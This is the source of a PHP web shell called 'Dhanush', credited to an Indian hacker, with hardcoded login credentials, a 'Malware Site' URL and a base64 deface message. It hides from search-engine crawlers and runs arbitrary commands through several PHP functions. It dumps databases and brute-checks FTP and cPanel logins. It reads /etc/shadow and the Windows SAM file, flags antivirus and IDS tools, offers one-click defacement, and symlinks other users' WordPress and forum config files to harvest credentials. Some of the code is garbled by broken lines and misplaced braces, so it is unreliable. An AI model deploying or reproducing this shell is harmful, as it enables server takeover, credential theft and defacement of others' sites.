Danush

<?
php
//========================================//
//========+++Dhanush+++==========//
//========================================//
//====+++Coded By Arjun+++===//
//========================================//
//=====+++An Indian Hacker+++=====//
//========================================//
//====Ashvin-2069/Oct-2012====//
// Set Username & Password
$user = "Jijle3";
$pass = "Jijle3";
$malsite = "http://fightagent.ru"; // Malware Site
$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "
You Just Got Hacked !!"
@set_magic_quotes_runtime(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "R
ambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AG
ENT'])) {
header('HTTP/1.0 404 Not Found');
exit; }
}
// Dump Database
if($_GET["action"] == "dumpDB")
{
$self=$_SERVER["PHP_SELF"];
if(isset($_COOKIE['dbserver']))
{
$date = date("Y-m-d");
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
$file = "Dump-$dbname-$date";
$file="Dump-$dbname-$date.sql";
$fp = fopen($file,"w");
function write($data)
{
global $fp;
fwrite($fp,$data);
}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables))
{
$i = $i['Tables_in_'.$dbname];
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TA
BLE ".$i));
write($create['Create Table'].";");
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_stri
ng($k)."'";
}
write("INSERT INTO $i VALUES(".implode("
,", $row).");");
}
}
}
fclose ($fp);
header("Content-Disposition: attachment; filename=" . $file);
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}
}
function shellstyle()
{
echo "<style type=\"text/css\">
<!-body,td,th {
color: #FF0000;
font-size: 14px;
}
input.but {
background-color:#000000;
color:#FF0000;
border : 1px solid #1B1B1B;
}
a:link {
color: #00FF00;
text-decoration:none;
font-weight:500;
}
a:hover {
color:#00FF00;
text-decoration:underline;
}
font.txt
{
color: #00FF00;
font-size:14px;
}
font.mainmenu
{
color:#FF0000;
font-size:14px;
}
a:visited {
color: #006600;
}
input.box
{
background-color:#0C0C0C;
color: lime;
-moz-border-radius:6px;
width:400;
border-radius:6px;
}
input.sbox
{
color: lime;
width:180;
border-radius:6px;
}
select.sbox
{
color: lime;
width:180;
border-radius:6px;
}
select.box
{
color: lime;
width:400;
border-radius:6px;
}
textarea.box
{
border : 3px solid #111;
color : lime;
margin-top: 10px;
border-radius:7px;
}
body {
}
.myphp table
{
width:100%;
padding:18px 10px;
}
.myphp td
{
background:#111111;
color:#00ff00;
padding:6px 8px;
border-bottom:1px solid #222222;
font-size:14px;
}
.myphp th, th
{
background:#181818;
}
-->
</style>";
}
if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
{
$os = "N/D";
$bdmessage = null;
$dir = getcwd();
if(stristr(php_uname(),"Windows"))
{
$SEPARATOR = '\\';
$os = "Windows";
$directorysperator="\\";
}
else if(stristr(php_uname(),"Linux"))
{
$os = "Linux";
$directorysperator='/';
}
function Trail($d,$directsperator)
{
$d=explode($directsperator,$d);
array_pop($d);
array_pop($d);
$str=implode($d,$directsperator);
return $str;
}
function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "<center><b>
Error : Connection Timeout.
Please Check The Target Hostname .</b></center>";exit;
}
else if ( curl_errno($ch) == 0 )
{
print "<center><b>[~]</b><font class=txt>
Cracking Success With Username "</font><font color=\"#FF0000\">$us
er</font><font color=\"#008000\">\"
and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\
"#008000\">\"</font></b></center><br><br>";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
global $cpanel_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{ print "<center><b>Error : Connection Timeout.
Please Check The Target Hostname.</b></center>";exit;}
else if ( curl_errno($ch) == 0 ){
print "<ecnter><b>[~]</b><font class=txt><b>
Cracking Success With Username "</font><font color=\"#FF0000\">$us
er</font><font color=\"#008000\">\"
and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"
#008000\">\"</font></b></center><br><br>";
}
curl_close($ch);
}
// Database functions
function listdatabase()
{
?>
<br>
<form>
<table>
<tr>
<td><input type="text" class="box" name="dbname"
></td>
<td><input type="button" onClick="viewtables('cr

eateDB',dbname.value)" value=" Create Database " class="but"></td>
</tr>
</table>
</form>
<br>
<?php
$mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['db
user'], $_COOKIE['dbpass']);
$result = mysql_query("SHOW DATABASE");
echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60
%;>\n";
$pDB = mysql_list_dbs( $mysqlHandle );
$num = mysql_num_rows( $pDB );
for( $i = 0; $i < $num; $i++ )
{
$dbname = mysql_dbname( $pDB, $i );
mysql_select_db($dbname,$mysqlHandle);
$result = mysql_query("SHOW TABLES");
$num_of_tables = mysql_num_rows($result);
echo "<tr>\n";
echo "<td><a href=# onClick=\"viewtables('listTables','$
dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
echo "<td><a href=# onClick=\"viewtables('listTables','$
dbname')\">Tables</a></td>\n";
echo "<td><a href=# onClick=\"viewtables('dropDB','$dbna
me')\">Drop</a></td>\n";
echo "<td><a href='$self?action=dumpDB&dbname=$dbname' o
nClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
echo "</tr>\n";
}
echo "</table>\n";
mysql_close($mysqlHandle);
}
function listtable()
{
echo "<div><font color=white size=3>[ $dbname ]</font> - <font c
olor=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font
size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[
Log Out ]</font> </a></div>";
?>
<br><br>
<form>
<table>
<tr>
<td><input type="text" class="box" name="tablena
me"></td>
<td><input type="button" onClick="viewtables('cr
eatetable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="crea
temydb" class="but"></td>
</tr>
</table>
<br>
<form>
<table>
<tr>
<td><textarea cols="60" rows="7" name="e
xecutemyquery" class="box">Execute Query..</textarea></td>
</tr>
<tr>
<td><input type="button" onClick="viewta
bles('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename
']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
</tr>
</table>
</form>
<?php
$pTable = mysql_list_tables( $dbname );
if( $pTable == 0 ) {
$msg = mysql_error();
echo "<h3>Error : $msg</h3><p>\n";
return;
}
$num = mysql_num_rows( $pTable );
echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60
%;>\n";
for( $i = 0; $i < $num; $i++ )
{
$tablename = mysql_tablename( $pTable, $i );
$result = mysql_query("select * from $tablename");
$num_rows = mysql_num_rows($result);
echo "<tr>\n";
echo "<td>\n";
echo "<a href=# onClick=\"viewtables('viewdata','$dbname
','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href=# onClick=\"viewtables('viewSchema','$dbna
me','$tablename')\">Schema</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href=# onClick=\"viewtables('viewdata','$dbname
','$tablename')\">Data</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href=# onClick=\"viewtables('empty','$dbname','
$tablename')\">Empty</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href=# onClick=\"viewtables('dropTable','$dbnam
e','$tablename')\">Drop</a>\n";
echo "</td>\n";
echo "</tr>\n";
}
echo "</table></form>";
echo "<div><font color=white size=3>[ $dbname ]</font> - <font c
olor=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font
size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[
Log Out ]</font> </a></div>";
}
function paramexe($n, $v)
{
$v = trim($v);
if($v)
{
echo '<span><font size=3>' . $n . ': </font></span>';
if(strpos($v, "\n") === false)
echo '<font size=2>' . $v . '</font><br>';
else
echo '<pre class=ml1><font class=txt size=3>' .
$v . '</font></pre>';
}
}
function rrmdir($dir)
{
if (is_dir($dir)) // ensures that we actually have a directory
{
$objects = scandir($dir); // gets all files and folders
inside
foreach ($objects as $object)
{
if ($object != '.' && $object != '..')
{
if (is_dir($dir . '/' . $object))
{
// if we find a directory, do a
recursive call
rrmdir($dir . '/' . $object);
}
else
{
// if we find a file, simply del
ete it
unlink($dir . '/' . $object);
}
}
}
// the original directory is now empty, so delete it
rmdir($dir);
}
}
function which($pr)
{
$path = execmd("which $pr");
if(!empty($path))
return trim($path);
else
return trim($pr);
}
function magicboom($text)
{
if (!get_magic_quotes_gpc())
return $text;
return stripslashes($text);
}
function execmd($cmd,$d_functions="None")
{
if($d_functions=="None")
{
$ret=passthru($cmd);
return $ret;
}
$funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
$d_functions=str_replace(" ","",$d_functions);
$dis_funcs=explode(",",$d_functions);
foreach($funcs as $safe)
{
if(!in_array($safe,$dis_funcs))
{
if($safe=="exec")
{
$ret=@exec($cmd);
$ret=join("\n",$ret);
return $ret;
}
elseif($safe=="system")
{
$ret=@system($cmd);
return $ret;
}
elseif($safe=="passthru")
{
$ret=@passthru($cmd);
return $ret;
}
elseif($safe=="shell_exec")
{
$ret=@shell_exec($cmd);
return $ret;
}
elseif($safe=="popen")
{
$ret=@popen("$cmd",'r');
if(is_resource($ret))
{
while(@!feof($ret))
$read.=@fgets($ret);
@pclose($ret);
return $read;
}
return -1;
}
elseif($safe="proc_open")
{
$cmdpipe=array(
0=>array('pipe','r'),
1=>array('pipe','w')
);
$resource=@proc_open($cmd,$cmdpipe,$pipes);
if(@is_resource($resource))
{
while(@!feof($pipes[1]))
$ret.=@fgets($pipes[1]);
@fclose($pipes[1]);
@proc_close($resource);
return $ret;
}
return -1;
}
}
}
return -1;
}
function getDisabledFunctions()
{
if(!ini_get('disable_functions'))
{
return "None";
}
else
{
return @ini_get('disable_functions');
}
}
function getFilePermissions($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000)
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000)
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000)
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000)
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000)
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000)
// FIFO pipe
$info = 'p';
} else {
// Unknown
{
{
{
{
{
{
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function filepermscolor($filename)
{
if(!@is_readable($filename))
return "<font color=\"#FF0000\">".getFilePermissions($fi
lename)."</font>";
else if(!@is_writable($filename))
return "<font color=\"#FFFFFF\">".getFilePermissions($fi
lename)."</font>";
else
return "<font color=\"#00FF00\">".getFilePermissions($fi
lename)."</font>";
}
function yourip()
{
echo $_SERVER["REMOTE_ADDR"];
}
function phpver()
{
$pv=@phpversion();
echo $pv;
}
function magic_quote()
{
echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font c
olor='red'>OFF</font>";
}
function serverip()
{
echo getenv('SERVER_ADDR');
}
function serverport()
{
echo $_SERVER['SERVER_PORT'];
}
function safe()
{
global $sm;
return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OF
F";
}
function serveradmin()
{
echo $_SERVER['SERVER_ADMIN'];
}
function systeminfo()
{
echo php_uname();
}
function curlinfo()
{
echo function_exists('curl_version')?("<font class=txt>Enabled</
font>"):("<font color='red'>Disabled</font>");
}
function oracleinfo()
{
echo function_exists('ocilogon')?("<font class=txt>Enabled</font
>"):("<font color='red'>Disabled</font>");
}
function mysqlinfo()
{
echo function_exists('mysql_connect')?("<font class=txt>Enabled<
/font>"):("<font color='red'>Disabled</font>");
}
function mssqlinfo()
{
echo function_exists('mssql_connect')?("<font class=txt>Enabled<
/font>"):("<font color='red'>Disabled</font>");
}
function postgresqlinfo()
{
echo function_exists('pg_connect')?("<font class=txt>Enabled</fo
nt>"):("<font color='red'>Disabled</font>");
}
function softwareinfo()
{
echo getenv("SERVER_SOFTWARE");
}
function download()
{
$frd=$_GET['download'];
$prd=explode("/",$frd);
for($i=0;$i<sizeof($prd);$i++)
{
$nfd=$prd[$i];
}
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".filesize($nfd));
header("Content-disposition: attachment; filename=\"".$nfd."\";");
readfile($nfd);
exit;
}
function HumanReadableFilesize($size)
{
$mod = 1024;
$units = explode(' ','B KB MB GB TB PB');
for ($i = 0; $size > $mod; $i++)
{
$size /= $mod;
}
return round($size, 2) . ' ' . $units[$i];
}
function showDrives()
{
global $self;
foreach(range('A','Z') as $drive)
{
if(is_dir($drive.':\\'))
{
$myd = $drive.":\\";
?>
<a href=javascript:void(0) onClick="changedir('dir','<?php echo
addslashes($myd); ?>')">
<?php echo $myd; ?>
</a>
<?php
}
}
}
function diskSpace()
{
return disk_total_space("/");
}
function freeSpace()
{
return disk_free_space("/");
}
function thiscmd($p)
{
$path = myexe('which ' . $p);
if(!empty($path))
return $path;
return false;
}
function mysecinfo()
{
function myparam($n, $v)
{
$v = trim($v);
if($v)
{
echo '<span><font color =red size=3>' . $n . ':
</font></span>';
if(strpos($v, "\n") === false)
echo '<font color =lime size=3>' . $v .
'</font><br>';
else
echo '<pre class=ml1><font color =lime s

ize=3>' . $v . '</font></pre>';
}
}
myparam('Server software', @getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
myparam('Loaded Apache modules', implode(', ', apache_ge
t_modules()));
myparam('Open base dir', @ini_get('open_basedir'));
myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
myparam('Safe mode include dir', @ini_get('safe_mode_include_dir
'));
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
myparam('Supported databases', implode(', ', $temp));
echo '<br>';
if($GLOBALS['os'] == 'Linux') {
myparam('Distro : ', myexe("cat /etc/*-release")
);
myparam('Readable /etc/passwd', @is_readable('/e
tc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[vie
w]</a>":'no');
myparam('Readable /etc/shadow', @is_readable('/e
tc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[vie
w]</a>":'no');
myparam('OS version', @file_get_contents('/proc/
version'));
myparam('Distr name', @file_get_contents('/etc/i
ssue.net'));
myparam('Where is Perl?', myexe('whereis perl'))
;
myparam('Where is Python?', myexe('whereis pytho
n'));
myparam('Where is gcc?', myexe('whereis gcc'));
myparam('Where is apache?', myexe('whereis apach
e'));
myparam('CPU?', myexe('cat /proc/cpuinfo'));
myparam('RAM', myexe('free -m'));
myparam('Mount options', myexe('cat /etc/fstab')
);
myparam('User Limits', myexe('ulimit -a'));
if(!$GLOBALS['safe_mode']) {
$userful = array('gcc','lcc','cc','ld','
make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','su
idperl');
$danger = array('kav','nod32','bdcored',
'uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripw
ire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logchec
k','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lyn
x','links','curl','get','lwp-mirror');
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(thiscmd($item))
$temp[] = $item;
myparam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(thiscmd($item))
$temp[] = $item;
myparam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(thiscmd($item))
$temp[] = $item;
myparam('Downloaders', implode(', ',$tem
p));
echo '<br/>';
myparam('HDD space', myexe('df -h'));
myparam('Hosts', @file_get_contents('/et
c/hosts'));
}
} else {
$repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sa
m");
$hostpath = addslashes($_SERVER["WINDIR"]."\system32\dri
vers\etc\hosts");
$netpath = addslashes($_SERVER["WINDIR"]."\system32\driv
ers\etc\\networks");
$sampath = addslashes($_SERVER["WINDIR"]."\system32\driv
ers\etc\lmhosts.sam");
echo "<font size=3>Password File : </font><a href=".$_S
ERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Downloa
d password file</font></b></a><br>";
echo "<font size=3>Config Files : </font><a href=javas
cript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size
=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileactio
n('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b
></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"
><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
$base = (ini_get("open_basedir") or strtoupper(ini_get("
open_basedir"))=="ON")?"ON":"OFF";
echo "<font size=3>Open Base Dir : </font><font class=t
xt size=3>" . $base . "</font><br>";
myparam('OS Version',myexe('ver'));
myparam('Account Settings',myexe('net accounts'));
myparam('User Accounts',myexe('net user'));
}
echo '</div>';
}
function myexe($in)
{
$out = '';
if (function_exists('exec')) {
}
}
@exec($in,$out);
$out = @join("\n",$out);
elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function exec_all($command)
{
$output = '';
if(function_exists('exec'))
{
exec($command,$output);
$output = join("\n",$output);
}
else if(function_exists('shell_exec'))
{
$output = shell_exec($command);
}
else if(function_exists('popen'))
{
$handle = popen($command , "r"); // Open the command pipe for reading
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($handle))
{
$output .= fread($handle, 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($handle))
{
$output .= fgets($handle,512);
}
}
}
pclose($handle);
}
else if(function_exists('system'))
{
ob_start(); //start output buffering
system($command);
$output = ob_get_contents();
// Get the ouput
ob_end_clean();
// Stop output buffering
}
else if(function_exists('passthru'))
{
ob_start(); //start output buffering
passthru($command);
$output = ob_get_contents();
// Get the ouput
ob_end_clean();
// Stop output buffering
}
else if(function_exists('proc_open'))
{
$descriptorspec = array(
1 => array("pipe", "w"), // stdout is a pipe that the child wil
l write to
);
$handle = proc_open($command ,$descriptorspec , $pipes); // This will re
turn the output to an array 'pipes'
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$output .= fread($pipes[1], 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$output .= fgets($pipes[1],512);
}
}
}
pclose($handle);
}
return(htmlspecialchars($output));
}
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?
"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
function getOGid($value)
{
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid =
$group
$owner
return
@getmygid();
= "?";
= $uid . "/". $gid;
$owner;
} else {
$name=@posix_getpwuid(@fileowner($value));
$group=@posix_getgrgid(@filegroup($value));
$owner = $name['name']. " / ". $group['name'];
return $owner;
}
}
function mainfun($dir)
{
global $ind, $directorysperator,$os;
$mydir = basename(dirname(__FILE__));
$pdir = str_replace($mydir,"",$dir);
$pdir = str_replace("/","",$dir);
$files = array();
$dirs = array();
$odir=opendir($dir);
while($file = readdir($odir))
{
if(is_dir($dir.'/'.$file))
{
$dirs[]=$file;
}
else
{
$files[]=$file;
}
}
$countfiles = count($dirs) + count($files);
$dircount = count($dirs);
$dircount = $dircount-2;
$myfiles = array_merge($dirs,$files);
$i = 0;
if(is_dir($dir))
{
if(scandir($dir) === false)
echo "<center><font size=3>Directory isn't readable</fo
nt></center>";
else
{
?><form method="post" id="myform" name="myform">
<table id="maintable" style="width:100%;" align="center" cellpadding="3"
>
<tr><td colspan="7"><center><div id="showmydata"></div></center></td></t
r>
<tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><fo
nt size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' D
irs And '.count($files).' Files'; ?>)</td>
<tr style="background-color:#0C0C0C; height:12px;">
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
<th>Modification Date</th>
<th>Rename</th>
<th>Download</th>
<th style="width:2%;">Action</th>
</tr>
<?php
foreach($myfiles as $val)
{
$vv = addslashes($dir . $directorysperator . $val);
$i++;
if($val == ".")
{
?><tr style="background-color:#0C0C0C;" onMouseO
ver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C
'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php e
cho addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=
2>CURDIR</font></td>
<td><a href=javascript:void(0) onClick="fileaction('perm
s','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
<?php if($os != 'Windows')
{
echo "<td align=center><font size=2>";
echo getOGid($dir)."</font></td>";
}
?>
<td align="center"><font class=txt><?php echo date('Y-md H:i:s', @filemtime($vv)); ?></font></td>
<td></td><td></td><td></td></</tr><?php
}
else if($val == "..")
{
$val = Trail($dir . $directorysperator . $val,$d
irectorysperator);
$vv = addslashes($val);
if(empty($vv))
$vv = "/"; ?>
<tr style="background-color:#0C0C0C;" onMouseOver="style
.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td cla
ss='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?
>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
<td><a href=javascript:void(0) onClick="fileaction('perm
s','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
{
echo getOGid($val)."</font></td>";
} ?>
<td align="center"><font class=txt><?php echo date('Y-m
-d H:i:s', @filemtime($val)); ?></font></td>
<td></td><td></td><td></td></tr><?php continue;
}
else if(is_dir($vv))
{
?>
<tr style="background-color:#0C0C0C;" onMouseOver="style

.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
<td class='dir'><a href=javascript:void(0) onClick="chan
gedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
<td class='info'><font size=2>DIR</font></td>
<td class='info'><a href=javascript:void(0) onClick="fileaction('per
ms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator .
$val); ?></a></td>
{
} ?>
<td align="center"><font class=txt><?php echo date('Y-m
-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
<td class="info"><a href=javascript:void(0) onClick="fil
eaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
<td></td>
<td class="info" align="center"><input type="checkbox" n
ame="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorys
perator . $val;?>"></td>
</tr></font>
<?php
}
else if(is_file($vv))
{
?>
<tr style="background-color:#0C0C0C;" onMouseOver="style.back
groundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
<td class='file'><a href=javascript:void(0) onClick="fileacti
on('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"])
|| ($val == "index.php") || ($val == "index.html") || ($val == "config.php") ||
($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else
{ echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { i
f(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv
')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
<td class='info'><font size=2><?php echo Huma
nReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
<td class='info'><a href=javascript:void(0) onClick="fileacti
on('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directoryspe
rator . $val); ?></a></td>
{
} ?>
<td align="center"><font class=txt><?php ech
o date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></
td>
<td class="info"><a href=javascript:void(0) onClick="fileacti
on('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
<td class="info"><a href="<?php echo $self;?>
?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</
font></a>
<td class="info" align="center"><input type="
checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir .

$directorysperator . $val;?>"></td>
</tr>
<p>
<?php
}
}
echo "</table>
<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkb
ox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </
font></label>
<select class=sbox name=choice style='width: 100px;'>
<option value=delete>Delete</option>
<option value=chmod>Change mode</option>
if(class_exists('ZipArchive'))
{
<option value=compre>Compress</option>
<option value=uncompre>Uncompress</option> }
</select>
<input type=button onClick=\"myaction(choice.value)\" value=Submit name=
checkoption class=but></form></div>";
}}
else
{
echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!
<br /></font></p>";
}
}
if(isset($_REQUEST["script"]))
{
$getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
?>
<center><table><tr><td><a href=javascript:void(0) onClick="getdata('manu
allyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
<td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font
class=txt size="4">| Do It Automatically |</font></a></td>
</tr></table></center>
<?php
}
else if(isset($_REQUEST['manuallyscript']))
{
?>
<center>
<form action="<?php echo $self; ?>" method="post">
<textarea class="box" rows="16" cols="100" name="passwd"></texta
rea><br>
<input type="button" OnClick="manuallyscriptfn(passwd.value)" va
lue="Get Config" class="but">
</form>
</center>
<?php
}
else if(isset($_REQUEST['scriptlocator']))
{
if(stristr(php_uname(),"Linux"))
{
$url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']
;
$path=explode('/',$url);
$url =str_replace($path[count($path)-1],'',$url);
function syml($usern,$pdomain)
{
symlink('/home/'.$usern.'/public_html/vb/includes/config
.php',$pdomain.'~~vBulletin1.txt');
symlink('/home/'.$usern.'/public_html/core/includes/conf
ig.php',$pdomain.'~~vBulletin5.txt');
symlink('/home/'.$usern.'/public_html/includes/config.ph
p',$pdomain.'~~vBulletin2.txt');
symlink('/home/'.$usern.'/public_html/forum/includes/con
fig.php',$pdomain.'~~vBulletin3.txt');
symlink('/home/'.$usern.'/public_html/vb/core/includes/c
onfig.php',$pdomain.'~~vBulletin5.txt');
symlink('/home/'.$usern.'/public_html/inc/config.php',$p
domain.'~~mybb.txt');
symlink('/home/'.$usern.'/public_html/config.php',$pdoma
in.'~~Phpbb1.txt');
symlink('/home/'.$usern.'/public_html/forum/includes/con
fig.php',$pdomain.'~~Phpbb2.txt');
symlink('/home/'.$usern.'/public_html/conf_global.php',$
pdomain.'~~ipb1.txt');
symlink('/home/'.$usern.'/public_html/wp-config.php',$pd
omain.'~~Wordpress1.txt');
